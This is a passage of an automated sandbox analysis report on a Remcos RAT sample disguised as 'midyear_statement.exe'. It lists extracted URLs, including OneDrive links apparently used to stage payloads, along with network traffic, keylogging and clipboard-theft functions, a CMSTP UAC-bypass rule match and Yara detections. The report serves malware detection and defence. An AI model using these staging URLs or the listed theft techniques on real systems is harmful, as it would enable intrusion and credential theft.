wkrriuhD.pif, 0000001F.00000002.1566764474.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 00000021.00000000.1636440948.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif.0.dr	String found in binary or memory: http://www.pmail.com
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
Source: midyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 0000001E.00000003.1545163878.00000000007FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aborlw.sn.files.1drv.com/
Source: Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aborlw.sn.files.1drv.com/o
Source: Dhuirrkw.PIF, 0000001E.00000003.1545101196.0000000000824000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aborlw.sn.files.1drv.com/y4mLOg16uNX2Id3t-nfFLVYL7CZhAgTRemSr1q_NX-Mvx_fpOOS9Dz7js9NACEXeYp5
Source: Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aborlw.sn.files.1drv.com/y4mXBt2sSJKJZHlLzI8sH3PFmgRqsPoY_FaTasOJSi4WNTk8bd6AgZ1TzwzQWZ2uDij
Source: midyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aborlw.sn.files.1drv.com/y4mdIO5pciNH8fpwGOAAIADTo3pXjwRKPU-X6-J-zpDME1cfDB5-C-zJvJ0Zyx9NPNN
Source: Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1616710283.000000000083A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aborlw.sn.files.1drv.com/y4mhPCChdz-WmirIkiDV2ww7X8Bbd2o2c6Warvjl_dk_jMmN6VWuryzdoRm3kPHX80_
Source: midyear_statement.exe, 00000000.00000003.1292113599.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1362063312.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.0000000000827000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abpoxw.sn.files.1drv.com/
Source: Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abpoxw.sn.files.1drv.com/y4mVdi6rp2qkaaDX5Txipl4hmgaKma0en0K10OdbofbDqqNgddkNvfFr34Mxc3bQcF3
Source: Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abpoxw.sn.files.1drv.com/y4maSSmIiFxHS53VrMh0Wc-KmE9UNGqFMoeO06mE8M1WEFsDmr1AeIzN4LcJU6cd0Kw
Source: Dhuirrkw.PIF, 0000001E.00000002.1567523437.00000000007E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abpoxw.sn.files.1drv.com/y4mhwTfeKQ4eY5KLg3nmxa_boO0q7i2wmVFOUDCXUh0ad78865G9-BX4CJ3kGlJVsre
Source: midyear_statement.exe, 00000000.00000002.1380482770.0000000015BD6000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1292113599.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abpoxw.sn.files.1drv.com/y4ms4H1tLcGEiSUU0ZXyS-1UhN1A1nY0HWv2H1VcTggiyFj5GyqXlnGNUvRGU1yWLZH
Source: Dhuirrkw.PIF, 00000020.00000003.1637043609.000000000082F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abpoxw.sn.files.1drv.com:443/y4maSSmIiFxHS53VrMh0Wc-KmE9UNGqFMoeO06mE8M1WEFsDmr1AeIzN4LcJU6c
Source: Dhuirrkw.PIF, 0000001E.00000003.1564727013.0000000000818000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abpoxw.sn.files.1drv.com:443/y4mhwTfeKQ4eY5KLg3nmxa_boO0q7i2wmVFOUDCXUh0ad78865G9-BX4CJ3kGlJ
Source: midyear_statement.exe, 00000000.00000003.1292113599.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abpoxw.sn.files.1drv.com:443/y4ms4H1tLcGEiSUU0ZXyS-1UhN1A1nY0HWv2H1VcTggiyFj5GyqXlnGNUvRGU1y
Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abqscw.sn.files.1drv.com/
Source: midyear_statement.exe, 00000000.00000003.1219564986.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abqscw.sn.files.1drv.com/y4m-zYwpFACL5iXnxCgcfUGrba1rEn19VhjL7w-TerMTn_xp_gGpLreK-PlTDk9AFPA
Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.0000000000803000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1598043310.0000000000838000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abqscw.sn.files.1drv.com/y4mM5VAFczkoUgXiRkT2NbXnlBwvzcPuKz5AwJErjUwbkEuoWmzy8jSXGy266gPIcJH
Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.0000000000803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abqscw.sn.files.1drv.com/y4mu3pWdZcj6Ve9WuLc8z50Ki8byXob_qMUj9cAdyMI-JlRVlQqz67Is5cy4lCX-g6M
Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.0000000000803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abqscw.sn.files.1drv.com:443/y4mu3pWdZcj6Ve9WuLc8z50Ki8byXob_qMUj9cAdyMI-JlRVlQqz67Is5cy4lCX
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c58
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac05
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?69c749c200c753dfb00f5bc8299ab8eb
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?a2555e10569a45fe03b885d268c50da9
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://fp-as.azureedge.net/apc/trans.gif?23ecc2fb73d617d9826364f47d1067db
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://fp-as.azureedge.net/apc/trans.gif?7bac4e73e9b20fcc41dc97447167937d
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/
Source: Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/W
Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/X
Source: Dhuirrkw.PIF, 0000001E.00000003.1545163878.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/a
Source: midyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/g
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wkrriuhD.pif	String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-07-50-22/PreSignInSettingsConfig.json
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=d75433bcf1f9312f1975
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=ad62f4
Source: Dhuirrkw.PIF, 00000020.00000002.1638568341.0000000000808000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.co
Source: Dhuirrkw.PIF, 00000020.00000002.1638568341.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/
Source: Dhuirrkw.PIF, 00000020.00000002.1639873625.0000000003C12000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=653A5056738F1A02%21262&authkey=
Source: Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=653A5056738F1A02%21263&authkey=
Source: Dhuirrkw.PIF, 00000020.00000002.1639873625.0000000003C12000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=653A5056738F1A02%21264&authkey=
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: wkrriuhD.pif	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49734 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1233A2B8 SetWindowsHookExA 0000000D,1233A2A4,00000000

24_2_1233A2B8

Installs a global keyboard hook

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\wkrriuhD.pif

Jump to behavior

Contains functionality for read data from the clipboard

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1233B70E OpenClipboard,GetClipboardData,CloseClipboard,

24_2_1233B70E

Contains functionality to modify clipboard data

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_123468C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	24_2_123468C1
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	27_2_0040987A
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	27_2_004098E2
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	28_2_00406DFC
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	28_2_00406E9F

Contains functionality to read the clipboard data

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1233B70E OpenClipboard,GetClipboardData,CloseClipboard,

24_2_1233B70E

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1233A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

24_2_1233A3E0

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1234C9E2 SystemParametersInfoW,

24_2_1234C9E2

System Summary

Malicious sample detected (through community Yara rule)

Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
